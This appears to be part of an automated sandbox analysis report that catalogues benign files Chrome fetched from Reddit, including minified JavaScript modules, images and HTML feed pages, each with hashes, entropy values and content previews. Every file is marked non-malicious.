                                                  Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var L=function(){return[function(z,t,A,g,l,I){return(z|8)==(z>>(I=["scrollingElement","scrollTop","documentElement"],1)&5||(g=t[I[0]]?t[I[0]]:tM||t.compatMode!="CSS1Compat"?t.body||t[I[2]]:t[I[2]],A=t.defaultView,l=new ls(A.pageXOffset||g.scrollLeft,A.pageYOffset||g[I[1]])),z)&&(A=~A,g?g=~g+t:A+=t,l=[g,A]),l},function(z,t,A,g,l,I,R){return((((R=[1,"prototype","X"],(z|2)>>3==R[0]&&(l=t[R[2]]?t[R[2]]():t))&&(g?G[14].bind(null,13):f[R[0]].bind(null,47))(l,[A]),z)|9)&7)==R[0]&&(g=new wg(new YW(A)),GW&&.t[R[1]]&&GW(g,t[R[1]]),I=g),I},function(z,t,A,g){return(z+4&(z-(g=[34,!1,"V"],2)&7||(n[32](59,t.I),G[24](g[0],t.I),n[
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JPEG image data, baseline, precision 8, 96x96, components 3
                                                  Category:dropped
                                                  Size (bytes):3026
                                                  Entropy (8bit):7.873859789994153
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:1101E51F3FFA68AC660B24133884A743
                                                  SHA1:6836BA14A953015399B33D6470FDB395852EC7DA
                                                  SHA-256:5536BC4E2C6C584AD4658200DF14FFEA65F5C14475EB4FFEBE0F9589F178BF06
                                                  SHA-512:41200948166FA49CA91328C85E820A4279D8695DD24D8D94A002DAF5BE1008B8E98FA25CBBF489328A96FA1E5D2785A92026F1991ACDF0BBE02D32AF362A2A7C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......`.`.."........................................=...........................!1Aa."Q.#2Rq.r...6Bb...34Dds.u.................................1.......................!.1Q."2ARaq.....$3CDb...............?.C&.^.[...$u&.}.6...\0jG.R...'.....4Y7..,..g.....6..|...+R@....t...q.......B....*...R..l....7.+..rS......R\o.;.R.o.......;%..<h.....=]~%...c,.F.|c&.d=..Al....5.z.H...j.s}*<.}.~.U).W...N3.}8P..c...X..=...l.G.....=tc...}.O.Bj..=.usr.=.....h....I..{.R.$.5a....@$......W.Tr.....W.m^d:.....p40l.....A..=k-7./.mdD.....{..?.C..u.v.i....f..^....A..z...O...!........@....u..e8..+.jb....Rr..Z........X.[n...c......pJ...*....Dx..)..b$...B..P[....*I.c+Z..8..E............:!..J.{.....7..i....2..5...-.t..IY.u^.....lGhPc......%..J.+.4....t...$<...z..I4kZ...X.s<.r...8...l.HP!@..k!...6s]...5d...w`6'.B.rG..XN..R.g;(oS.....Z....i........RVS
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1118)
                                                  Category:downloaded
                                                  Size (bytes):1192
                                                  Entropy (8bit):5.153131934917022
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2A63CE9F77964D94E6B811FD6AF9FA5F
                                                  SHA1:555CABC0F2CB72A1B99C466AF62BF332F523BE12
                                                  SHA-256:D4AD3F47A0EC03D41FC49A89328707CF76E7F2FB80EFFDCFE51583CD35DC010C
                                                  SHA-512:50EC0F172FFEB11F302E88C383E02D241E68351E9442703709285D649B20D54CBBC0AE837DD5C1FCBF215F398E6CD276A80B4F069EE5A469255A5A124AC52CC1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/search-typeahead-expandable-section-1d8b2dde.js
                                                  Preview:import{_ as e,ac as t,n as a,e as s,L as o}from"./shell-4994f581.js";import{S as r}from"./search-results-dropdown-modifier-client-js-b0d36951.js";import{d as c,p as i}from"./club-award-confirmation-client-js-b22d6f4f.js";import{s as d}from"./icon-4d9be652.js";let n=class extends d{constructor(){super(...arguments),this.open=!1,this.id="",this.handleClick=()=>{const e=!this.open;this.updateLocalStorage(e),this.open=e,this.toggleHeaderTrackers()}}toggleHeaderTrackers(){this.trackers?.forEach((e=>{e.disabled=!e.disabled}))}updateLocalStorage(e){const t=i(o.SearchTypeaheadExpanded)??{};t[this.id]=!!e,c(o.SearchTypeaheadExpanded,t)}connectedCallback(){super.connectedCallback(),this.closest("summary")?.addEventListener("click",this.handleClick)}disconnectedCallback(){super.disconnectedCallback(),this.closest("summary")?.removeEventListener("click",this.handleClick)}createRenderRoot(){return this}};e([t(r)],n.prototype,"trackers",void 0),e([a({reflect:!0,type:Boolean,attribute:"open"})],n.pro
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 48x48, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):300
                                                  Entropy (8bit):7.142482557437172
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:8772415503B7DF5117C1EC393F0FBC1E
                                                  SHA1:25CC09695B2BB58624E33FDE302F5B2C51B043EF
                                                  SHA-256:98A5F50082AE6996B2E7C0DFCFBF3034E9063B52A48DB210177770A005025470
                                                  SHA-512:65C12D7B625D60EE99C812EFCAB1ED65B372B64E8A1983535FB832C91B65ED18BC586AC38164F2ED4599472AB0F6DBB850C53E48E4493D3308D95ED048720E79
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://styles.redditmedia.com/t5_dijpkz/styles/profileIcon_akbki6b145he1.png?width=48&height=48&frame=1&auto=webp&crop=&s=f71319db70cb345de1bf4e719e5cad9dd5918093
                                                  Preview:RIFF$...WEBPVP8 ....p....*0.0.>Q".D..!.T.8....*.&.J...Y...h....xB.I.......W.1..w.:.....v.k..goL...S...\i{......3.[.y{.$....z......s.....d.,+........=I..w.4..\g.<.....fB.+l..64."..0{....w.+G...4=.z..._.......fR..o.`~W.....#P.=v.....N..T{o.....]..9[..|.yeI{..r...P..'..m.2.wY.....yE.....
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 320x167, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):13540
                                                  Entropy (8bit):7.984890130461249
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B8C4E01AF52F6BA14235C1D544B27304
                                                  SHA1:6F3C33F65E3D2B0EBC20BC4AB97A5418E23EABE4
                                                  SHA-256:27A00075CE50C119AAF76FD4A799676C8A3EADBDCF45CFE14AB4E76D969B1DAD
                                                  SHA-512:892A6BE73BA89C29C90772EDFB590A7308685EC37A2AF1168779CF8A9CD7E6CBBA40F4544A145B6CBC9D6C5AAAB526D642DA2B351E792ECD1072656FBC20BF91
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://external-preview.redd.it/harvard-university-sues-trump-administration-v0-CnN8ZfKcOn4wDwHWh1APYslDeCre3dW2lslBX2v2lPk.jpg?width=320&crop=smart&auto=webp&s=7ffccf74a52099eec5a9b04e930399271e4cd6cf
                                                  Preview:RIFF.4..WEBPVP8 .4......*@...>Q .D..!....8...p.Ka7v....)...... [...R.o....{......<......l....G.'........|...3...?..o.O.v.......I.......w.................._.>o.|......M.?.?+?.~.}.......7...p.............@.a.....G..O..O..........o.`.......3....?....7...s.'......}+.....K.+.......OU7R..u...s..{a...eet.z....+.5. <.F_.`.4...x@......H.O.?<..SNA/..W...T...+;%j..!ej.m.k4.S......'......_a... ..6MRg..U._..hf .oH%....~sB(Q..l..W...W..O.....=..v...@....6(=X.^.mu.5..?ps..M[.=tD..$.g.w...x........zL.,7..cRbH...&.5..g.o?..|.0U....h.....E.OW...&FkuM...B."..9..2...p.....h...B.Lx..Z..yfV.i..i.<.m...l&.W.?.EH......=.;.....C..ERg......r+c...."....K..#......<P7.Q)...~....P.z.0...zK....:.{..%Em.P3.%..bYYd.{.#h".[...[..&.N....P...<O(..~.#..(.a.....%...."W..N.a.+8.y.avB.4...4.WW..r..B..k....f./.....$...a...x.E&9.d(p.....y....n.m........O.O.[.r:).;*......z.,..~..&....J.4../.y.R..y..<.}(..S.6.|.^.g7J..x.6b......6.k.<..'%r,........r....C.....w..k..n.....S.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (35801)
                                                  Category:downloaded
                                                  Size (bytes):35857
                                                  Entropy (8bit):5.225456074798819
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:61E3340C6D0EE80C5C298E9F97123670
                                                  SHA1:48A794A6F092874DCEE430470A5B6F1B44352C5F
                                                  SHA-256:BFD5A1A49D26D8752550E5D0E2DD27EA30D31B1D5739ABBD886D51E0DAEEDE17
                                                  SHA-512:6B406660CA40DCBF405CD95CA59064B51FB3413E182B40BFFBF004DEBBEF6F3432F9356426A2D52FC414B7A6544962551075B0345277BF652B07C0C4E89D4D4F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/with-post-actions-283c4a7a.js
                                                  Preview:import"./rpl-tooltip-958cc522.js";import{i as t}from"./profile-creation-61d368d7.js";import{d as e,W as i}from"./with-share-687454db.js";import{P as s}from"./rpl-popper-3f91bd17.js";import"./tooltip.base-aa9be46d.js";import{as as o,fO as a,dT as r,a as n,_ as d,n as l,g as c,av as p,ax as h,aw as m,r as u,c as g,H as b,es as v,T as P,fP as y,u as C,v as A,P as f,m as k,fQ as w,s as S,fg as I,dx as E,fR as R,aM as T,K as U,O as M}from"./shell-4994f581.js";import{x,bW as F,Y as D,D as O,bd as N,ba as _,Q as B,bX as L,aN as V,bj as H,p as j,bY as $,av as W,bZ as K,b_ as G,bU as z,bu as Q,b$ as Y,az as q,bo as X,ar as Z,aU as J,c0 as tt,c1 as et,a4 as it,c2 as st,c3 as ot,bs as at,a0 as rt,aX as nt,br as dt,c4 as lt,c5 as ct,bn as pt,_ as ht,M as mt,c as ut,aO as gt,U as bt,aP as vt,aR as Pt,aQ as yt,aq as Ct,aV as At,bN as ft,aT as kt,aS as wt}from"./icon-4d9be652.js";import{A as St}from"./award-controller-7d9d8182.js";import"./promote-post-button-551d8c60.js";import{d as It}from"./expand
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JPEG image data, progressive, precision 8, 576x1024, components 3
                                                  Category:dropped
                                                  Size (bytes):53265
                                                  Entropy (8bit):7.981258146021679
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:ABC0B42BB02E55B34AC735D023D552B3
                                                  SHA1:D042D98DA602BC70C4170C331E2ACCDE1942CB0E
                                                  SHA-256:338FAD03CEBE1DA912C109BCFDAD46D25FC91CB51B2F0249F299D65D477245BB
                                                  SHA-512:42FEE4DFE20E4111555712A53A540F155B55A7D7B9DEF54F708903864E58B36C0F7AEC496832A459F7A0AC5E66C7EDD90CC59A6E2E1C9047D24696274BEC03F3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}........@.."...............................................................................}.%Huf...XU..b.S..R.....N.:QE..!}D.)qH..:%c.e R.H.F...kJ%bQ.....}...<`..W&.W.z.....\...mD.U.f{gM.(...cOKjT.....%.@.......Q.pt....I......"..;&.6P..aNC`9;C.Bg.p....hMt.-.".)...Vr../.3....z..<..i.+.K.T..$:...+.,....k.#fk.^...W..93.E+ .'.t.....E.....AD.....'...U+B...52....a.FU.M>4..9I.h*rK$..MHd$zG.Ib..S./..E.]..tY8.'.m.$*...J.~.....D...Tb.e..\#.6...s......4......C.Sq.o.p...(.1@......6!q...V9.sj-2.&.f.0\ZVHX;^.bF.<...Y.../I..>...%....e\..x.cus.G.\......lU.:..:I(..Jq...]..tFF..l..\.....X.,.!...P....j..d...06]8.aG...%.>.;..4....(..i...4..T...3x.=K:0L......2B&...K..a...;...^.F.'.b3d......AX...m.J........~."4w..A..k.m.h&..J..F4..[b.;.\.L....3.SU){;AC9QY...te.!...l.{.yg.....,...~............[....C..@K...K.>..v...0..8..(.......
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:exported SGML document, Unicode text, UTF-8 text, with very long lines (851)
                                                  Category:downloaded
                                                  Size (bytes):556901
                                                  Entropy (8bit):5.379345933271467
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:BCE9ED358005724864EB06E3A8013DBF
                                                  SHA1:822CBE7DBDC40CA1426B48DFC9296BFF705B1915
                                                  SHA-256:E80AE46B842C7FC0905E340F56E7876D68EF8E4EE1FA42867940A6A310D9E3FB
                                                  SHA-512:0E7BB342D9F7348EC7F02F3581CBA1B2808752C0F1191946284F5FF9C76365A77319223C30F8D16F011E16EFDB0CA4477D8AE1BAA017620EAD2CD779FCE3A086
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.reddit.com/svc/shreddit/feeds/popular-feed?after=dDNfMWs0d21uaQ%3D%3D&distance=4&sort=HOT&adDistance=2&navigationSessionId=945dc28c-1e9e-440b-9a8f-36a8d573acf7&ad_posts_served=1&cursor=dDNfMWs0d21uaQ%3D%3D
                                                  Preview:. <faceplate-loader. name="DevvitPrivacyModal_n98hrb". src="https://www.redditstatic.com/shreddit/en-US/devvit-privacy-modal-client-js-dac8f582.js". loading="programmatic". ></faceplate-loader>. . <faceplate-partial. name="DevvitPrivacyModal_n98hrb". src="/svc/shreddit/devvit-privacy-modal/:subredditId/:postId/:appSlug/:appName/:appOwnerId". loading="programmatic". >. . . </faceplate-partial>. . . <article class="w-full m-0" aria-label="You can tell how nervous she was initially">. "data-ks-item" is used by the modqueue-keyboard-shortcuts manager to fetch the item on which to dispatch events to -->. <shreddit-post data-ks-item . class="block relative cursor-pointer group bg-neutral-background focus-within:bg-neutral-background-hover hover:bg-neutral-background-hover xs:rounded-[16px] px-md py-2xs my-2xs nd:visible". permalink="/r/MadeMeSmile/comments/1k5b3rb/you_can_tell_how_nervous_
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2179)
                                                  Category:downloaded
                                                  Size (bytes):2230
                                                  Entropy (8bit):5.161784344766379
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5225A16F49D20CDD7A92E3E93F0B0D98
                                                  SHA1:7F3CF284A25BE39E8AE8AA5E2258C657F1D43A03
                                                  SHA-256:E6C57640DEEF7A4F438B392300AE80933E29C2E59D25868597EB19EBBBA64568
                                                  SHA-512:E6DDCCE0BE94076F8985F8802054997C586904E7123C0A308B0FA723C6EF0A84DED9EF703E1F8A3B21EE87763ED59F96399BE9F7662A4ADE4C62B95DCEC0ECE4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/zoomable-img-d1a4d4d2.js
                                                  Preview:import{_ as e,g as i,n as t,e as s,E as o,aD as a}from"./shell-4994f581.js";import{q as l}from"./club-award-confirmation-client-js-b22d6f4f.js";import{s as n}from"./icon-4d9be652.js";let d=class extends n{constructor(){super(...arguments),this.fillContainer=!1,this.zoomedIn=!1,this.disabled=!1,this.media=null,this._events=new o(this),this._click=this._events.define("click",this.onClick),this.checkMediaSize=()=>{let e=0,i=0;if(this.media instanceof HTMLVideoElement)e=this.media.videoWidth,i=this.media.videoHeight;else{if(!this.media||this.media&&!this.media.complete)return;e=this.media.naturalWidth,i=this.media.naturalHeight}this.disabled=e<=this.clientWidth&&i<=this.clientHeight,this.zoomedIn=!this.disabled&&this.zoomedIn},this.checkMediaSizeDebounced=a(this.checkMediaSize,100)}createRenderRoot(){return this}connectedCallback(){super.connectedCallback(),this.media=this.querySelector("img,video"),this.media&&this.media.addEventListener("load",this.checkMediaSize,{once:!0}),requestAnimat
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (543)
                                                  Category:downloaded
                                                  Size (bytes):590
                                                  Entropy (8bit):5.0254514737018745
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B90AC3BC7CBD216698DFBAF0CEC97A18
                                                  SHA1:AD000241312AA5442C3E02433D55AA7EEE145FA1
                                                  SHA-256:BBE908830A09B90616573E3AF41604A6022445E8C03B6C63C40F6A26616A4D2B
                                                  SHA-512:00D6B943BF1E9FE9BC84A411781E0624F4328BE603EFD3403455FA9FB85C339D506F8CF659894A8A01A9BE6E1B1365909D2F334AAEDD742BCA161594A1DBF1BE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/flex-nav-2ca2e7d8.js
                                                  Preview:const n="hui_flex_nav_expanded_state";var e;!function(n){n.Collapsed="0",n.Expanded="1"}(e||(e={}));const a={[e.Collapsed]:"flex-nav-collapsed",[e.Expanded]:"flex-nav-expanded"},t={LeftSidebarContainer:"left-sidebar-container",ContainerDiv:"flex-left-nav-container",ContentsDiv:"flex-left-nav-contents",ButtonsContainer:"flex-nav-buttons",ExpandButton:"flex-nav-expand-button",CollapseButton:"flex-nav-collapse-button",SubgridContainer:"subgrid-container"},o=Object.values(e),l=n=>!!n&&o.includes(n);export{t as F,n as a,e as b,a as c,l as i};.//# sourceMappingURL=flex-nav-2ca2e7d8.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (6508)
                                                  Category:downloaded
                                                  Size (bytes):6561
                                                  Entropy (8bit):5.419949563960342
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:450ACB35F09A3231F18A30426D3287D1
                                                  SHA1:99BDBB4622098F0FEA90A484F2EB1E174754B362
                                                  SHA-256:50D6A1E42CE7B6332C7CA3C80F6CF0AE68D863299D05B4980E1CB295BC24583C
                                                  SHA-512:5B794D1AE32898AAC424727167BC18E0F0EE6644966783AE07C9F442CB41DA5E30B0921EE698BBAF1602B136ADAB2347997B9E554B0E1969C5FC61E29FFE064D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/validate-image-fc8b467a.js
                                                  Preview:import{_ as e,n as t,e as a,m as i}from"./shell-4994f581.js";import{a as r,x as o,l as n}from"./icon-4d9be652.js";import{B as s,cD as l,bn as p}from"./club-award-confirmation-client-js-b22d6f4f.js";import{T as m}from"./text-input-1c750feb.js";var d;!function(e){e.BORDERED="bordered",e.SECONDARY="secondary"}(d||(d={}));let c=class extends m{constructor(){super(...arguments),this.prefix="",this.type="text",this.appearance=d.SECONDARY,this.persistentTrailingIcon=!1,this.withSelect=!1}static get styles(){return[super.styles,r`input{outline:0;background:0 0;border:none;width:100%}:host([appearance=bordered]) .label-container:not(.without-label) .input-container.stateful-input{transform:translateY(0)}::slotted([slot=leadingIcon]){margin-right:var(--spacer-xs);display:flex}.input-prefix{margin-right:var(--spacer-4xs)}.input-suffix{margin-left:var(--spacer-4xs)}.input-prefix,.input-suffix{flex-shrink:0}:host([appearance=bordered]) .label-container{border-radius:20px 20px 0 0;align-items:flex-e
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JPEG image data, baseline, precision 8, 1080x2340, components 3
                                                  Category:dropped
                                                  Size (bytes):265346
                                                  Entropy (8bit):7.958344467622223
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:32DACDA36F7B2F3A0234335EF322BCDB
                                                  SHA1:46D616B2939851244B71081C251CAFCC20DE78D6
                                                  SHA-256:745350CC12099547F489FD22968155E02D71FAEF00FDFE745208CCFADC9F26DE
                                                  SHA-512:49F41EF1CC07EFD4069F4765EA3BEAF52BE47341C04B59175BEF3B626F46207DF3020CACFA8E7A50835B8BBF97F781FF92BB3E27867B291B8F7B53FE83F9D0A2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......$.8..".........................................g...........................!.1Q.Aq.."2Rar.......6STUst...#3457Bu....8DVb...$.%C......Wv..&'Fc...(E...................................G.........................1.!A.Qa..."25Tq.s.....#3BRbSrt$4.%D.6C..Ue..............?..q.....f...~Jx.r>..........^o...t.s.N..$.O.U.......=..q=w$.U.." ...""...." ....UT..." *.QUI.\.W) .....U^.....z.+....d..Y..(d. V5d.)F^.P...,.....Y...,.+# YB..P....,..YVE./. X....r..d..Y..T..Z.V*\.......UH....P....D@...DD....D@...DD....D@...DD....D@...P...P.D@...DD....D@...DD....D@P.*. ...""...." (....UT(.**. -D(...j.ZUY(.......Z.*.R.X.*.FIaV.yV.FX..ed+.T.ZU...C........U...?..Z.jX,....[.C..8..=....R.^.c...{N.a....N.'...f..qI.z".q....DD....D@...DD.B..U@...UTUR@W+U.H*.....W.b.+"..^...r..pY...@...Z...,.e(.... ...z.... X...%dd.(X...Taf@..AeY.r..d..Y..*^.@...+.*...pV*\........
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text, with very long lines (59781)
                                                  Category:dropped
                                                  Size (bytes):898657
                                                  Entropy (8bit):5.487201100669596
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:ABFA8B7ED350D0B07199B9EE81274524
                                                  SHA1:EFA4784386D144F9D497D73656F57C41D3011FE2
                                                  SHA-256:B6DD209B074592920B78D4E0D7641C99E1D1E65A796FD84B8BE004315EEC190A
                                                  SHA-512:FA378D14221091BA37D60D256DB61029FE0034C697941498307FED9B78E14FB40E09B9308BE88D4D322AE2CF4BE144E19C31FD8D74826D46E332A315E715A34D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:. <!DOCTYPE html>. <html lang="en-US" class="theme-beta">. <head prefix="og: https://ogp.me/ns#">. <title>Reddit - The heart of the internet</title>. <meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover">. <meta name="apple-mobile-web-app-capable" content="yes">. <meta name="apple-mobile-web-app-status-bar-style" content="black">. <meta name="msapplication-navbutton-color" content="#000000">. <meta name="theme-color" content="#000000">. . . . <link rel="preconnect" href="https://www.redditstatic.com/" crossorigin="anonymous" />. <link rel="dns-prefetch" href="https://www.redditstatic.com/" />. . . <script type="module" nonce="ruGbpEzGSX2QKxKGMahruQ==">let n;Promise.resolve();let e=null;async function i(){return e||(e=async function(){if(n=window.navigation,!n){console.log("Navigation API not supported, loading polyfill");try{const{applyPolyfill:e}=awa
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 216x294, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):12418
                                                  Entropy (8bit):7.986514297678613
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B1BF34062FB9411090412537C3860531
                                                  SHA1:3EC643908CE454327C0454121B26E0E0FB065AE9
                                                  SHA-256:6401DABA9AE7B387753C07DD3923716F4D4363155257F9614E6F476B4439D5C1
                                                  SHA-512:84A0C49186105F47D1B3B31922C6AC22D2DBFB48C69CCC944919A2A70982B094C498968288983DDE92FF961951B00F1CE9CB880FA113646A3BC5254A605C4DEF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://preview.redd.it/3vnbmz4nv8we1.jpg?width=216&crop=smart&auto=webp&s=dbefa11bd4d3481aabc576079e4c0b52e79daa6f
                                                  Preview:RIFFz0..WEBPVP8 n0.......*..&.>Q".E#.!.{=.8.......U.\.%q.=.}.K..:...c./.;............my............o.~..A.....=......;....u..3..~..1.Q.O...._....P..........Y...#.?......../..e.c.....X...............G....v.......C.g.......?........_\.Y.U .B.D..tF:..........B`\..k|.|.wJ/...'A.......a...?...a;4tj..........P.8.V......Lt.R..\T..y.53.kh.....c....s....n.Nrk'A[-.+K.T.....=..%....9.....G.Ws.O..+....T......l..GI.y.+p;.?....Q.r.;.JS..s.M.$.....V.q..#|.2.....`....*|.D8...*@K.t......5.e..^z...zgYE.{.FPlm.F..V..O.).'.....%J0...'.MG.u...o.W..gY..{.d74.+/Z,..?1...l.BtZB../....b.......b.j..p.d.@.q&^.B..x.j........ro6...m...+.:.s...\.>.&..D..kc.7.a.Y....j..9.x.].*.hh.Q.....g@....#...&.....K.....Y..h.6...._# ......V.[._~.5..(,i.W'.h...P...3.*.}LV.80Y.w.G....R..o.f.O.f....e..F..D...x..2....t.H.gW.>....`.W.k..*R.Y..E..Ab....5......>M.~...cMP..p....k...4..)..v...>.....h.Y..b~..\Q.........]G.&..J.....@....7..9iN.L..I...W.cj...M..K..u.. .9.....,.a.t#.Wd..k|..M.t.K.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 48 x 48, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):2601
                                                  Entropy (8bit):7.844229837416041
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:AABE653D2055DCD5D723A6950EA64BB8
                                                  SHA1:87A1AFE5B5E2DAB7FFBF3AE56B33EE6B30102014
                                                  SHA-256:451600F97A9088D94A9F9885E79B13DC63F2D0E4284A6D6A9438CE2CA99E2F69
                                                  SHA-512:1BEC46D01A5713494619B80BFD6B3CFA800F2E857045FC78613D4470F0E38B33D6BC950BFFAB42B6518E8CDA8AC43826B78F213DCB91E56D6D32692C2B09C212
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.PNG........IHDR...0...0.....`.......PLTE...............f..It....%<I7CJ........ .........................................!.......%+.....#)4;.. !,2. $0=D3AH*=H+7>GV`;KU0M^$<I2@I7ZoCWc3TgOakAR\>_p.K[=bwt..Eq.@]n...Pbm...Z..k..Wmy..._{.Jw.d|....}...................................e.....{.......|........;d|...Nhxx..H|....p...........j....s........;i.g....t...u............2?.........AQ[q.....!+0.........p........*5:............Op..7If..8N[kjk<,&.U....^A9....'1uqoz..?<<...h..y.....}}}....#.......Q..h..ft{....4.......!%(N3+...!FZ.HW4DM...l..fSOQ..6[p=r.689....>G}.....y.....^(.m.....V..v..5n.*%#.@.Dj....c7*..!......r..WXX...,Qfc..U.........K.DCB..."3<...efg_..u..;ADE..\XV\....~...OOP":G...V....5207UfFOTz..___ ..ZKG...L..~.....V..m..f#.F40<|.h..a..W.._...,..........HHH...V|..1...&\u.iecv..#@P......l..&....WtRNS................)3BMZbmy................................................................[?....pHYs................lIDATx.u..x.d..?.....P....TPa.1..I.ni.PZ6..h...[.mm9U..., ....
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (12123)
                                                  Category:downloaded
                                                  Size (bytes):12178
                                                  Entropy (8bit):5.139815663330838
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:99627A4C6CA8DB396319AD599B050B89
                                                  SHA1:927690422581FE91460C24141BD7F8DC785DD851
                                                  SHA-256:383B62A5677DCCAE7AE0F65FBA444D973EF71005F1D979F01FBAAE23B2CF99C9
                                                  SHA-512:7938DC218659B7828FC50BC394E47FE6C4CEF042DB9687C45608B4CE69FF220420EAE562744E53BA556E972F3CDB9562450CD58C714F1F7E10A014649344E538
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/rpl-bottom-sheet-8e59d76a.js
                                                  Preview:import{ee as e,ef as t,eg as i,Y as o,_ as s,n as a,cJ as n,eh as r,ei as h,aY as l,ej as d,cM as c,cN as p,ek as u,a3 as g,aS as m,e as f}from"./shell-4994f581.js";import{a as b,x as v}from"./icon-4d9be652.js";import{T as S}from"./index-56e4320e.js";import{ar as y}from"./club-award-confirmation-client-js-b22d6f4f.js";const k=(e,t,{parentBoundary:i=document.documentElement,root:o=document,cache:s=new Set})=>{const a=o.elementsFromPoint(e,t),n=[];for(const e of a)if(!s.has(e)){if(!y(i,e))break;n.push(e),s.add(e)}const r=[];for(const i of n)i.shadowRoot&&r.push(...k(e,t,{parentBoundary:i,root:i.shadowRoot,cache:s}));return[...n,...r]};class w{get inSwipe(){return this._inSwipe}set inSwipe(e){this._inSwipe!==e&&(this._inSwipe=e,this.host.requestUpdate("inSwipe",!this._inSwipe))}constructor(e,{recognitionThreshold:t=10,mouseSupport:i=!1}={recognitionThreshold:10,mouseSupport:!1}){this.host=e,this.mouseSupport=!1,this.rafId=null,this._inSwipe=!1,this.protectScrollInterference=!0,this.recogn
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (980)
                                                  Category:downloaded
                                                  Size (bytes):1044
                                                  Entropy (8bit):5.1308282377774574
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2560B0E0F9691CA6BEF118DC64EF0EA4
                                                  SHA1:918A13A7D79AE14D6A20D057ACA89D0FB8E48F39
                                                  SHA-256:3AF007C7D9540B4ADB7F5C6A246726FD9D3CFBDE48E87C2EE7D55488914F96F6
                                                  SHA-512:767232D72B0422C49E8E6710B0393B676DDF1BC4D9474BAE24FAF4489AEE6E93F10F38D11E8B46E9BFAE92D86444F8644FB97791336DB5C2624AC01EEA73EE21
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/recommends-feed-client-js-679e639f.js
